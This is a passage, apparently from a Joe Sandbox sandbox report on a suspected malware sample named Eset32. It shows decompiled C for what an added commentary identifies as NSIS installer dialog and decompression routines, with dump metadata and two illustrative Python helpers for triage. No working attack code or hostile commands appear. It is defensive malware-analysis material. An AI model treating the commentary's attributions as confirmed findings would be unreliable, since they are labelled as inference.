                                                          								goto L60;
                                                          							}
                                                          							L61:
                                                          							_v8 = _v8 + 1;
                                                          							_v32 = _v32 + 4;
                                                          							_v44 = _v44 + 1;
                                                          						} while (_v8 <= _v28);
                                                          						goto L62;
                                                          					}
                                                          					_t277 = 0;
                                                          					do {
                                                          						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                          						_t277 = _t277 + 4;
                                                          						_t235 = _t235 - 1;
                                                          						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                          					} while (_t235 != 0);
                                                          					goto L21;
                                                          				}
                                                          				 *_a24 =  *_a24 & 0x00000000;
                                                          				 *_a28 =  *_a28 & 0x00000000;
                                                          				return 0;
                                                          			}
Instruction addresses for the listing above (the decompiler's address column, detached from its code lines during extraction): 0x00407127 to 0x00407454.

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                          • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                          • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
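Two loops in the listing above are worth recognising when triaging this function. The loop that toggles `_t287` against a descending mask `_t246` and then XORs one more time is the increment of a counter stored bit-reversed, and the loop that writes `_a4` at stride `1 << (_v8 - _t186)` replicates a single entry across every table slot that shares the same low bits. Together these are the idioms of a Huffman decode-table builder of the kind used by inflate-style decompressors. That identification is this editor's reading of the code, not a statement made by the report; if it holds, the function is decompression support code rather than miner logic, which helps decide which parts of the sample deserve manual attention. The example below is added here and is not code from the report or from the sample: it rewrites the two loops in Python with hypothetical function names and assumes the simple case in which no bits have already been consumed by an outer table (the `_t186 == 0` case).

```python
from typing import Any, Dict, List


def next_code_bit_reversed(code: int, top_bit: int) -> int:
    """Advance a bit-reversed code by one.

    Mirrors the listing's loop over _t287/_t246: clear set bits from the top
    down until a clear bit is found, then set that bit. Because the code is
    stored least-significant-bit-first, this is an ordinary increment seen
    through a bit reversal, which lets a decode table be indexed directly by
    the next bits pulled from the input stream.
    """
    mask = top_bit
    while code & mask:
        code ^= mask
        mask >>= 1
    return code ^ mask


def bit_reverse(value: int, nbits: int) -> int:
    """Reverse the low nbits of value (reference used to check the loop)."""
    out = 0
    for _ in range(nbits):
        out = (out << 1) | (value & 1)
        value >>= 1
    return out


def table_order(nbits: int) -> List[int]:
    """Visit all nbits-wide codes in the order the listing's counter produces."""
    order: List[int] = []
    code = 0
    for _ in range(1 << nbits):
        order.append(code)
        code = next_code_bit_reversed(code, 1 << (nbits - 1))
    return order


def fill_entries(table_bits: int, code: int, code_len: int, entry: Any) -> Dict[int, Any]:
    """Replicate one entry for a code shorter than the table index width.

    Mirrors the listing's stride loop. With no bits consumed by an outer table
    (the _t186 == 0 case assumed here), the entry is written to every slot
    whose low code_len bits equal the code, stepping by 1 << code_len.
    """
    table: Dict[int, Any] = {}
    step = 1 << code_len
    idx = code
    while idx < (1 << table_bits):
        table[idx] = entry
        idx += step
    return table


if __name__ == "__main__":
    print(table_order(3))                            # [0, 4, 2, 6, 1, 5, 3, 7]
    print(sorted(fill_entries(4, 0b101, 3, "sym")))  # [5, 13]
```

`table_order(3)` yields the 3-bit codes in the order the listing visits them, 0, 4, 2, 6, 1, 5, 3, 7, which is exactly the bit reversal of 0..7, and `fill_entries(4, 0b101, 3, entry)` shows a 3-bit code occupying slots 5 and 13 of a 16-entry table, so any 4-bit index ending in those three bits resolves to the same symbol.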

                                                          C-Code - Quality: 96%
                                                          			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct HWND__* _v12;
                                                          				long _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v28;
                                                          				signed char* _v32;
                                                          				int _v36;
                                                          				signed int _v44;
                                                          				int _v48;
                                                          				signed int* _v60;
                                                          				signed char* _v64;
                                                          				signed int _v68;
                                                          				long _v72;
                                                          				void* _v76;
                                                          				intOrPtr _v80;
                                                          				intOrPtr _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t203;
                                                          				intOrPtr _t206;
                                                          				intOrPtr _t207;
                                                          				long _t212;
                                                          				signed int _t216;
                                                          				signed int _t227;
                                                          				void* _t230;
                                                          				void* _t231;
                                                          				int _t237;
                                                          				long _t242;
                                                          				long _t243;
                                                          				signed int _t244;
                                                          				signed int _t250;
                                                          				signed int _t252;
                                                          				signed char _t253;
                                                          				signed char _t259;
                                                          				void* _t264;
                                                          				void* _t266;
                                                          				signed char* _t284;
                                                          				signed char _t285;
                                                          				long _t290;
                                                          				signed int _t300;
                                                          				signed int _t308;
                                                          				signed char* _t316;
                                                          				int _t320;
                                                          				int _t321;
                                                          				signed int* _t322;
                                                          				int _t323;
                                                          				long _t324;
                                                          				signed int _t325;
                                                          				long _t327;
                                                          				int _t328;
                                                          				signed int _t329;
                                                          				void* _t331;
                                                          
                                                          				_v12 = GetDlgItem(_a4, 0x3f9);
                                                          				_v8 = GetDlgItem(_a4, 0x408);
                                                          				_t331 = SendMessageA;
                                                          				_v24 =  *0x42f468;
                                                          				_v28 =  *0x42f434 + 0x94;
                                                          				_t320 = 0x10;
                                                          				if(_a8 != 0x110) {
                                                          					L23:
                                                          					if(_a8 != 0x405) {
                                                          						_t298 = _a16;
                                                          					} else {
                                                          						_a12 = 0;
                                                          						_t298 = 1;
                                                          						_a8 = 0x40f;
                                                          						_a16 = 1;
                                                          					}
                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                          						_v16 = _t298;
                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                          							if(( *0x42f43d & 0x00000002) != 0) {
                                                          								L41:
                                                          								if(_v16 != 0) {
                                                          									_t242 = _v16;
                                                          									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                          										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                          									}
                                                          									_t243 = _v16;
                                                          									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                          										_t298 = _v24;
                                                          										_t244 =  *(_t243 + 0x5c);
                                                          										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                          											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                          										} else {
                                                          											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L48;
                                                          							}
                                                          							if(_a8 == 0x413) {
                                                          								L33:
                                                          								_t298 = 0 | _a8 != 0x00000413;
                                                          								_t250 = E00404ACE(_v8, _a8 != 0x413);
                                                          								_t325 = _t250;
                                                          								if(_t325 >= 0) {
                                                          									_t99 = _v24 + 8; // 0x8
                                                          									_t298 = _t250 * 0x418 + _t99;
                                                          									_t252 =  *_t298;
                                                          									if((_t252 & 0x00000010) == 0) {
                                                          										if((_t252 & 0x00000040) == 0) {
                                                          											_t253 = _t252 ^ 0x00000001;
                                                          										} else {
                                                          											_t259 = _t252 ^ 0x00000080;
                                                          											if(_t259 >= 0) {
                                                          												_t253 = _t259 & 0x000000fe;
                                                          											} else {
                                                          												_t253 = _t259 | 0x00000001;
                                                          											}
                                                          										}
                                                          										 *_t298 = _t253;
                                                          										E0040117D(_t325);
                                                          										_a12 = _t325 + 1;
                                                          										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
                                                          										_a8 = 0x40f;
                                                          									}
                                                          								}
                                                          								goto L41;
                                                          							}
                                                          							_t298 = _a16;
                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                          								goto L41;
                                                          							}
                                                          							goto L33;
                                                          						} else {
                                                          							goto L48;
                                                          						}
                                                          					} else {
                                                          						L48:
                                                          						if(_a8 != 0x111) {
                                                          							L56:
                                                          							if(_a8 == 0x200) {
                                                          								SendMessageA(_v8, 0x200, 0, 0);
                                                          							}
                                                          							if(_a8 == 0x40b) {
                                                          								_t230 =  *0x42a874;
                                                          								if(_t230 != 0) {
                                                          									ImageList_Destroy(_t230);
                                                          								}
                                                          								_t231 =  *0x42a888;
                                                          								if(_t231 != 0) {
                                                          									GlobalFree(_t231);
                                                          								}
                                                          								 *0x42a874 = 0;
                                                          								 *0x42a888 = 0;
                                                          								 *0x42f4a0 = 0;
                                                          							}
                                                          							if(_a8 != 0x40f) {
                                                          								L90:
                                                          								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
                                                          									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                          									ShowWindow(_v8, _t321);
                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                          								}
                                                          								goto L93;
                                                          							} else {
                                                          								E004011EF(_t298, 0, 0);
                                                          								_t203 = _a12;
                                                          								if(_t203 != 0) {
                                                          									if(_t203 != 0xffffffff) {
                                                          										_t203 = _t203 - 1;
                                                          									}
                                                          									_push(_t203);
                                                          									_push(8);
                                                          									E00404B4E();
                                                          								}
                                                          								if(_a16 == 0) {
                                                          									L75:
                                                          									E004011EF(_t298, 0, 0);
                                                          									_v36 =  *0x42a888;
                                                          									_t206 =  *0x42f468;
                                                          									_v64 = 0xf030;
                                                          									_v24 = 0;
                                                          									if( *0x42f46c <= 0) {
                                                          										L86:
                                                          										if( *0x42f42c == 4) {
                                                          											InvalidateRect(_v8, 0, 1);
                                                          										}
                                                          										_t207 =  *0x42ebfc; // 0x4ab049
                                                          										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                          											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
                                                          										}
                                                          										goto L90;
                                                          									}
                                                          									_t322 = _t206 + 8;
                                                          									do {
                                                          										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                          										if(_t212 != 0) {
                                                          											_t300 =  *_t322;
                                                          											_v72 = _t212;
                                                          											_v76 = 8;
                                                          											if((_t300 & 0x00000001) != 0) {
                                                          												_v76 = 9;
                                                          												_v60 =  &(_t322[4]);
                                                          												_t322[0] = _t322[0] & 0x000000fe;
                                                          											}
                                                          											if((_t300 & 0x00000040) == 0) {
                                                          												_t216 = (_t300 & 0x00000001) + 1;
                                                          												if((_t300 & 0x00000010) != 0) {
                                                          													_t216 = _t216 + 3;
                                                          												}
                                                          											} else {
                                                          												_t216 = 3;
                                                          											}
                                                          											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                          											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                          											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                          										}
                                                          										_v24 = _v24 + 1;
                                                          										_t322 =  &(_t322[0x106]);
                                                          									} while (_v24 <  *0x42f46c);
                                                          									goto L86;
                                                          								} else {
                                                          									_t323 = E004012E2( *0x42a888);
                                                          									E00401299(_t323);
                                                          									_t227 = 0;
                                                          									_t298 = 0;
                                                          									if(_t323 <= 0) {
                                                          										L74:
                                                          										SendMessageA(_v12, 0x14e, _t298, 0);
                                                          										_a16 = _t323;
                                                          										_a8 = 0x420;
                                                          										goto L75;
                                                          									} else {
                                                          										goto L71;
                                                          									}
                                                          									do {
                                                          										L71:
                                                          										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                          											_t298 = _t298 + 1;
                                                          										}
                                                          										_t227 = _t227 + 1;
                                                          									} while (_t227 < _t323);
                                                          									goto L74;
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                          							goto L93;
                                                          						} else {
                                                          							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                          							if(_t237 == 0xffffffff) {
                                                          								goto L93;
                                                          							}
                                                          							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                          							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                          								_t324 = 0x20;
                                                          							}
                                                          							E00401299(_t324);
                                                          							SendMessageA(_a4, 0x420, 0, _t324);
                                                          							_a12 = _a12 | 0xffffffff;
                                                          							_a16 = 0;
                                                          							_a8 = 0x40f;
                                                          							goto L56;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					_v36 = 0;
                                                          					 *0x42f4a0 = _a4;
                                                          					_v20 = 2;
                                                          					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
                                                          					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
                                                          					 *0x42a87c =  *0x42a87c | 0xffffffff;
                                                          					_v16 = _t264;
                                                          					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
                                                          					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                          					 *0x42a874 = _t266;
                                                          					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                          					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
                                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                          						SendMessageA(_v8, 0x111b, _t320, 0);
                                                          					}
                                                          					DeleteObject(_v16);
                                                          					_t327 = 0;
                                                          					do {
                                                          						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                          						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                          							if(_t327 != 0x20) {
                                                          								_v20 = 0;
                                                          							}
                                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
                                                          						}
                                                          						_t327 = _t327 + 1;
                                                          					} while (_t327 < 0x21);
                                                          					_t328 = _a16;
                                                          					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                          					_push(0x15);
                                                          					E0040417B(_a4);
                                                          					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                          					_push(0x16);
                                                          					E0040417B(_a4);
                                                          					_t329 = 0;
                                                          					_v16 = 0;
                                                          					if( *0x42f46c <= 0) {
                                                          						L19:
                                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                          						goto L20;
                                                          					} else {
                                                          						_t316 = _v24 + 8;
                                                          						_v32 = _t316;
                                                          						do {
                                                          							_t284 =  &(_t316[0x10]);
                                                          							if( *_t284 != 0) {
                                                          								_v64 = _t284;
                                                          								_t285 =  *_t316;
                                                          								_v88 = _v16;
                                                          								_t308 = 0x20;
                                                          								_v84 = 0xffff0002;
                                                          								_v80 = 0xd;
                                                          								_v68 = _t308;
                                                          								_v44 = _t329;
                                                          								_v72 = _t285 & _t308;
                                                          								if((_t285 & 0x00000002) == 0) {
                                                          									if((_t285 & 0x00000004) == 0) {
                                                          										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                          									} else {
                                                          										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                          									}
                                                          								} else {
                                                          									_v80 = 0x4d;
                                                          									_v48 = 1;
                                                          									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                          									_v36 = 1;
                                                          									 *( *0x42a888 + _t329 * 4) = _t290;
                                                          									_v16 =  *( *0x42a888 + _t329 * 4);
                                                          								}
                                                          							}
                                                          							_t329 = _t329 + 1;
                                                          							_t316 =  &(_v32[0x418]);
                                                          							_v32 = _t316;
                                                          						} while (_t329 <  *0x42f46c);
                                                          						if(_v36 != 0) {
                                                          							L20:
                                                          							if(_v20 != 0) {
                                                          								E004041B0(_v8);
                                                          								goto L23;
                                                          							} else {
                                                          								ShowWindow(_v12, 5);
                                                          								E004041B0(_v12);
                                                          								L93:
                                                          								return E004041E2(_a8, _a12, _a16);
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}
Memory-address column belonging to the decompiled lines above (extracted apart from the code it annotated): instruction addresses run from 0x00404b9e to 0x0040517b; entries of 0x00000000 mark lines with no address.
                                                          0x00000000
                                                          0x00405006
                                                          0x00405011
                                                          0x00405014
                                                          0x00405019
                                                          0x0040501b
                                                          0x0040501f
                                                          0x0040502f
                                                          0x00405039
                                                          0x0040503b
                                                          0x0040503e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405021
                                                          0x00405021
                                                          0x00405027
                                                          0x00405029
                                                          0x00405029
                                                          0x0040502a
                                                          0x0040502b
                                                          0x00000000
                                                          0x00405021
                                                          0x00405004
                                                          0x00404fdf
                                                          0x00404f22
                                                          0x00000000
                                                          0x00404f38
                                                          0x00404f42
                                                          0x00404f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00404f59
                                                          0x00404f5e
                                                          0x00404f6a
                                                          0x00404f6a
                                                          0x00404f6c
                                                          0x00404f7b
                                                          0x00404f7d
                                                          0x00404f81
                                                          0x00404f84
                                                          0x00000000
                                                          0x00404f84
                                                          0x00404f22
                                                          0x00404bd6
                                                          0x00404bd9
                                                          0x00404bdc
                                                          0x00404bec
                                                          0x00404bff
                                                          0x00404c0a
                                                          0x00404c10
                                                          0x00404c1e
                                                          0x00404c31
                                                          0x00404c36
                                                          0x00404c41
                                                          0x00404c4a
                                                          0x00404c60
                                                          0x00404c70
                                                          0x00404c7c
                                                          0x00404c7c
                                                          0x00404c81
                                                          0x00404c87
                                                          0x00404c89
                                                          0x00404c8c
                                                          0x00404c91
                                                          0x00404c96
                                                          0x00404c98
                                                          0x00404c98
                                                          0x00404cb8
                                                          0x00404cb8
                                                          0x00404cba
                                                          0x00404cbb
                                                          0x00404cc0
                                                          0x00404cc6
                                                          0x00404cca
                                                          0x00404ccf
                                                          0x00404cd7
                                                          0x00404cdb
                                                          0x00404ce0
                                                          0x00404ce5
                                                          0x00404ced
                                                          0x00404cf0
                                                          0x00404dbf
                                                          0x00404dd2
                                                          0x00000000
                                                          0x00404cf6
                                                          0x00404cf9
                                                          0x00404cfc
                                                          0x00404cff
                                                          0x00404cff
                                                          0x00404d04
                                                          0x00404d0d
                                                          0x00404d10
                                                          0x00404d14
                                                          0x00404d17
                                                          0x00404d1a
                                                          0x00404d23
                                                          0x00404d2c
                                                          0x00404d2f
                                                          0x00404d32
                                                          0x00404d35
                                                          0x00404d73
                                                          0x00404d9e
                                                          0x00404d75
                                                          0x00404d84
                                                          0x00404d84
                                                          0x00404d37
                                                          0x00404d3a
                                                          0x00404d48
                                                          0x00404d52
                                                          0x00404d5a
                                                          0x00404d61
                                                          0x00404d6c
                                                          0x00404d6c
                                                          0x00404d35
                                                          0x00404da4
                                                          0x00404da5
                                                          0x00404db1
                                                          0x00404db1
                                                          0x00404dbd
                                                          0x00404dd8
                                                          0x00404ddb
                                                          0x00404df8
                                                          0x00000000
                                                          0x00404ddd
                                                          0x00404de2
                                                          0x00404deb
                                                          0x0040517d
                                                          0x0040518f
                                                          0x0040518f
                                                          0x00404ddb
                                                          0x00000000
                                                          0x00404dbd
                                                          0x00404cf0

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
                                                          • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                          • Opcode Fuzzy Hash: 9c9edc283e25dc213d4f824251f13dff68fe0008e79e33de9b0021577515009d
                                                          • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

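The dump names in the Memory Dump Source list encode the layout of the sample's image in memory: the 16-digit field is the region's base virtual address and the following 8-digit field is its page protection (0x20 for the executable region at 0x401000, 0x02 and 0x04 for the read-only and writable data regions), with 0x01000000 marking MEM_IMAGE, which agrees with "based on PE: true" and "Offset: 00400000". The script below is an added example, not part of this report or of Joe Sandbox; it decodes those names and resolves a virtual address such as the decompiled function's start (0x00403CA7) or one of the globals it touches to the region that contains it. The field order, the treatment of the two undecoded fields, and the rule that a region extends up to the next listed base (the names carry no sizes) are assumptions; the image base 0x400000 is taken from the report.

```python
"""Decode Joe Sandbox .sdmp dump names and locate a virtual address.

Added example for this report, not Joe Sandbox code. Assumed field layout
(an assumption, only partly confirmed by the report):
  <proc>.<snapshot>.<dump id>.<base VA>.<protection>.<?>.<region type>.<?>.sdmp
Base VA, protection (PAGE_*) and region type (MEM_*) are decoded; the two
unlabelled fields are kept raw. Sizes are not present, so a region is
assumed to run up to the next listed base (also an assumption).
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constants from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)

# Constructed input: names copied from the report's "Memory Dump Source" list.
SAMPLE_NAMES = [
    "00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    region_type: int

    @property
    def executable(self) -> bool:
        # The PAGE_EXECUTE* constants occupy bits 4..7; guard/nocache bits sit higher.
        return (self.protect & 0xF0) != 0


def parse_sdmp_name(name: str) -> DumpRegion:
    """Decode one dump file name; raises ValueError for anything else."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return DumpRegion(name=name, base=int(m["base"], 16),
                      protect=int(m["prot"], 16), region_type=int(m["type"], 16))


def load_regions(names: Iterable[str]) -> List[DumpRegion]:
    """Parse all names and return them sorted by base address."""
    return sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.base)


def describe(region: DumpRegion) -> str:
    prot = PAGE_PROTECT.get(region.protect & 0xFF, f"0x{region.protect:x}")
    kind = MEM_TYPE.get(region.region_type, f"0x{region.region_type:x}")
    return f"{region.base:#010x}  {prot:<24} {kind}"


def find_region(regions: List[DumpRegion], va: int) -> Optional[DumpRegion]:
    """Region containing va: the highest listed base that is <= va (assumed
    extent, see module docstring). Addresses below the first base hit nothing."""
    hit = None
    for r in sorted(regions, key=lambda r: r.base):
        if r.base <= va:
            hit = r
    return hit


def executable_regions(regions: List[DumpRegion]) -> List[DumpRegion]:
    return [r for r in regions if r.executable]


def rva(va: int, image_base: int = 0x400000) -> int:
    """Relative virtual address; the report lists the image at Offset 00400000."""
    if va < image_base:
        raise ValueError("address below image base")
    return va - image_base


if __name__ == "__main__":
    regs = load_regions(SAMPLE_NAMES)
    for r in regs:
        print(describe(r))
    target = 0x00403CA7  # start of the decompiled function E00403CA7
    hit = find_region(regs, target)
    kind = "exec" if hit and hit.executable else "data"
    print(f"{target:#x} -> region {hit.base:#x} ({kind}), RVA {rva(target):#x}")
```

Running it lists one executable region (0x401000) and places both E00403CA7 and the writable globals the function references (for example 0x42a878, which lands in the PAGE_READWRITE region at 0x40A000) in the expected regions; an address that resolves to an executable region outside the listed image regions would be the first thing to look at when a dump comes from an injected process.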
                                                          C-Code - Quality: 84%
                                                          			// Dialog procedure: _a4 = hwnd, _a8 = uMsg, _a12 = wParam, _a16 = lParam.
                                                          			// The message handling below (WM_INITDIALOG setup of controls 1 and 2, 64-byte
                                                          			// records indexed by *0x40a1dc, DM_SETDEFID to control 2, a child dialog placed
                                                          			// over control 1018) matches the outer DialogProc of the NSIS installer stub;
                                                          			// that attribution is an analyst inference, not a finding stated in this report.
                                                          			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                          				struct HWND__* _v32;
                                                          				void* _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t35;
                                                          				signed int _t37;
                                                          				signed int _t39;
                                                          				struct HWND__* _t49;
                                                          				signed int _t68;
                                                          				struct HWND__* _t74;
                                                          				signed int _t87;
                                                          				struct HWND__* _t92;
                                                          				signed int _t100;
                                                          				int _t104;
                                                          				signed int _t116;
                                                          				signed int _t117;
                                                          				int _t118;
                                                          				signed int _t123;
                                                          				struct HWND__* _t126;
                                                          				struct HWND__* _t127;
                                                          				int _t128;
                                                          				long _t131;
                                                          				int _t133;
                                                          				int _t134;
                                                          				void* _t135;
                                                          				void* _t143;
                                                          
                                                          				_t116 = _a8;
                                                          				if(_t116 == 0x110 || _t116 == 0x408) { // WM_INITDIALOG, or WM_USER+8 (application-defined page-change notification)
                                                          					_t35 = _a12;
                                                          					_t126 = _a4;
                                                          					__eflags = _t116 - 0x110;
                                                          					 *0x42a878 = _t35;
                                                          					if(_t116 == 0x110) { // WM_INITDIALOG: one-time setup
                                                          						 *0x42f428 = _t126;
                                                          						 *0x42a88c = GetDlgItem(_t126, 1); // control id 1 = IDOK
                                                          						_t92 = GetDlgItem(_t126, 2); // control id 2 = IDCANCEL
                                                          						_push(0xffffffff);
                                                          						_push(0x1c);
                                                          						 *0x429858 = _t92;
                                                          						E0040417B(_t126);
                                                          						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // GCL_HICON (-14): icon handle kept at 0x42ec08
                                                          						 *0x42ebec = E0040140B(4);
                                                          						_t35 = 1;
                                                          						__eflags = 1;
                                                          						 *0x42a878 = 1;
                                                          					}
                                                          					_t123 =  *0x40a1dc; // 0xffffffff: current record index, -1 before the first one
                                                          					_t134 = 0;
                                                          					_t131 = (_t123 << 6) +  *0x42f460; // records are 64 bytes each; table base at 0x42f460
                                                          					__eflags = _t123;
                                                          					if(_t123 < 0) {
                                                          						L34:
                                                          						E004041C7(0x40b); // WM_USER+11 (application-defined)
                                                          						while(1) {
                                                          							_t37 =  *0x42a878;
                                                          							 *0x40a1dc =  *0x40a1dc + _t37;
                                                          							_t131 = _t131 + (_t37 << 6);
                                                          							_t39 =  *0x40a1dc; // 0xffffffff
                                                          							__eflags = _t39 -  *0x42f464;
                                                          							if(_t39 ==  *0x42f464) { // index reached the record count stored at 0x42f464
                                                          								E0040140B(1);
                                                          							}
                                                          							__eflags =  *0x42ebec - _t134; // 0x0
                                                          							if(__eflags != 0) {
                                                          								break;
                                                          							}
